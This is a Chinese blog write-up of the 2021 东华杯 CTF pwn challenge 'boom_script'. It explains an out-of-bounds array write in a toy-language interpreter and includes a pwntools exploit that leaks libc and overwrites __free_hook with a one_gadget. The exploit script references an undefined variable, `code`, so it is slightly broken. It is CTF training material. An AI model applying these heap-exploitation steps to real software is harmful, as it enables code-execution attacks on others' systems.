2021 东华杯 pwn boom_script

最新推荐文章于 2022-07-21 11:50:59 发布
最新推荐文章于 2022-07-21 11:50:59 发布
阅读量264 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/121511700
版权

在这里插入图片描述
RELRO没开。

在这里插入图片描述
程序本身的逻辑是实现了一个boom语言的编译器,我们输入boom语言会给我们编译。

但是对于我们做题人来讲,因为程序体量太大,我们逆向起来会非常麻烦,所以我们结合他一些可能会出漏洞的地方,进行一些猜测并尝试。

我们最后将漏洞点放在了他的array,也就是数组的地方。
猜测他数组可以造成越界。

我们来检查一下对不对。

我们就简单的

array arr[30];
arr[25]=1;
arr[26]=1;
arr[27]=1;
arr[28]=1;
arr[29]=1;
arr[32]=1;

在这里插入图片描述
我们明显发现有越界,现在的问题就是如何能把这个越界利用起来。

首先我们要再去看一下malloc、free函数是在什么情况下使用的,便于我们使用数组越界进行利用。

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
我们结合代码,结合我们的调试我们发现,字符串的赋值功能就是释放掉原来的chunk然后再申请一个chunk。

我们通过阅读代码发现
在这里插入图片描述
程序通过这个地方来决定使用的是什么功能。

我们要注意到prints功能。
在这里插入图片描述注意到prints的功能对应的数字是0x8a

找到实现这个功能的函数
在这里插入图片描述我们可以通过prints一个小字符串,来泄露chunk残留的libc地址。

那么我们的利用过程如下:

通过字符串赋值来获得一个大点的chunk。然后通过prints泄露libc地址
在这里插入图片描述
剩下的我们就正常还是通过赋值得到chunk然后越界写就好了。

exp部分有参考小绿草的大佬,表示感谢!

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

local = 1
if local:
    r = process('./boom_script')
else:
    r = remote("192.168.40.178",8999)
    
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()

def debug():
    gdb.attach(r)
    pause()
    
def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))


payload = ""
payload += "array a[1];"
payload += "array b[1];"
payload += "str=\""+"a"*0x500+"\";"
payload += "str=\""+"a"*0x800+"\";"
payload += "prints(\" \");"
payload += "libc_base=0;"
payload += "inputn(libc_base);"
payload += "free_hook=libc_base+"+str(0x18c8)+";"
payload += "one_gadget=libc_base+"+str(0x4497f)+";"
payload += "str=\""+"a"*0x68+"\";"
payload += "str1=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x8+"\";"
payload += "str2=\""+"a"*0x28+"\";"
payload += "str1=\""+"a"*0x28+"\";"
payload += "a[5]=free_hook;"
payload += "str3=\""+"a"*0x8+"\";"
payload += "array c[0];"
payload += "c[0]=one_gadget;"
payload += "str1=\""+"\x00"*0x8+"\";"

sla("$", "1")
sla("length:\n", str(len(code)))
debug()
sla("code:\n", code)
libc_base = u64(ru('\x7f')[-6:] + '\x00\x00')
lg("libc_base", libc_base)

sd(p64(libc_base))

ti()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021东华pwn部分wp
eeeeeight的博客
11-01 1605
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
pwnscripts:非常简单的脚本可以加快二进制漏洞利用程序的创建
05-06
pwnscripts(0.6.0) 非常简单的脚本,可以加快二进制漏洞利用程序的创建。 要使用,请pip install pwnscripts或运行 git clone https://github.com/152334H/pwnscripts cd pwnscripts pip install -e . 并将from pwn import *替换from pwn import * from pwnscripts import * ,例如 from pwnscripts import * context . binary = './my_challenge' ... 另外, libc_database()扩展需要 。 您可能需要查看user_tests_and_examples.py中的一些示例。 特征 Pwnscripts具有许多不同的功能。 图书馆 像之类的总是感到不完整。
东华-pwn-cpp1
One_p_Two_w的博客
11-11 3053
东华-pwn-cpp1 前一阵子东华pwn题,比赛时候没做出来,说起来那时候我才刚学到fastbin attack,天天在和libc2.23打交道,比赛的时候时候看见libc全是2.31的…孩子人都傻了,遂去misc划水。。。(r n m,退钱!) 现在终于看了tcache,寻思试一下之前的赛题,于是有了这篇博客,做起来发现,好像并没有那么难? 我本地的环境就是2.31的,所以就在本地尝试复现了一下,文件已经传到了网盘,想复现的师傅们可以在这里下载 分析 main函数如下 菜单 new new中允
JS函数BOOM、DOM、事件
weixin_30550271的博客
04-16 491
screen对象 */ console.log(screen.width);//屏幕宽度 console.log(screen.height);//屏幕高度 console.log(screen.availWidth);//可用宽度 console.log(screen.availHeight);//可用高度 屏幕高度-任务栏高度 /* * location对象 * * 完...
boom.js:用于构建DOM树的简单模块
05-06
繁荣是荷兰人的树。 boom.js是一个用于构建DOM树的简单库。 只需放置一个boom (树),将其传递给容器选择器和一些takken (分支),它将呈现您在容器中指定的DOM树。 这使您可以以编程方式呈现DOM树。 压缩后只有〜1kb,不需要jQuery或其他依赖项。 用法 通过npm安装: npm install boom.js 导入应用 //ES5 var boom = require ( 'boom.js' ) . boom var tak = require ( 'boom.js' ) . tak //ES6 :) import { boom , tak } from 'boom.js' 或仅包含boom.js / boom.min.js,即可在全球范围内使用boom和tak < script src =" node_modules/dist/boom.min.js "
pwn2021 东华(部分)
woodwhale的博客
10-31 3636
pwn2021 东华(部分) 1、cpp1 典中典之堆溢出,改俩堆块重叠进入unsorted bin,然后申请其中一个回来,就能泄露libc。 之后就是堆溢出改fd为free_hook写入system #!/usr/bin/python # -*- coding: UTF-8 -*- # ----------------------------------- # @File : exp.py # @Author : woodwhale # @Time : 2021/10/31 12
pwn1_sctf_2016
weixin_56301399的博客
07-21 1754
这道题目的情况是多了个替换字符的函数,使得一个I在存储中变为you,一个字节变为三字节,这时候需要根据情况确定多少字符使得栈溢出。 还是照常的流程,但题目已经开始变化了,我现在还是一知半解迷迷糊糊的状态,害,菜狗子还需努力。......
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1306
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种广泛应用的数字控制技术,主要用于调节电子设备的功率或模拟信号。在单片机系统中,PWM脉冲发生器是核心部件,它通过改变脉冲宽度来调整输出信号的平均电压,从而...
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
[pwn]VMpwn:2020网鼎青龙组pwn boom2 wp
热门推荐
Breeze的博客
05-12 1万+
2020网鼎青龙组pwn boom2 wp 比赛的时候被特斯拉那道隐写恶心到了,导致一直在肝那道题,也没看pwn,赛后看了组内大佬的wp,感觉这道pwn也不是很难,于是自己又做了一遍。这道题总共80+队伍做出来,反而更难的pwn1 boom1却有200+队伍做出来,不得不说py真的很严重,赛后我看群里说比赛的时候好像有一份pwn1的exp在全网流通,有点小恶,但也无所谓,名词不重要,自己学到东西才是最重要的。 题目分析 首先检查一下安全策略: 安全策略全开,然后简单看一下逻辑: 执行之后让你输入co
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8293
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7011
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 5884
尝试过很多解决方案之后无果 决定研究一下它的整个流程
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 5618
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
linux 安装codeql环境 (一)基本环境搭建
yongbaoii的博客
04-10 5147
cccccccodeql
PWN 更换目标程序libc
yongbaoii的博客
12-29 4827
网上这方面我感觉还是比较少的,在这里把我的方法拿出来防止大家踩坑。 这一块知识不大懂的推荐去看《程序员的自我修养》第八章共享库那一章节。 我们换libc的原因是在调试程序的时候我们本地的libc可能跟远程计算机上的libc不一样,不是可能,基本上都不一样,那么我们程序加载libc之后里面的一些函数的偏移地址就会跟我们想的不一样,从而导致脚本不停出错。那么就需要我们去把程序所链接的libc从本地libc更换成远程服务器上的libc。 原理简单的说就是用patchelf把程序依赖libc的那个软连接改一下,或者
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值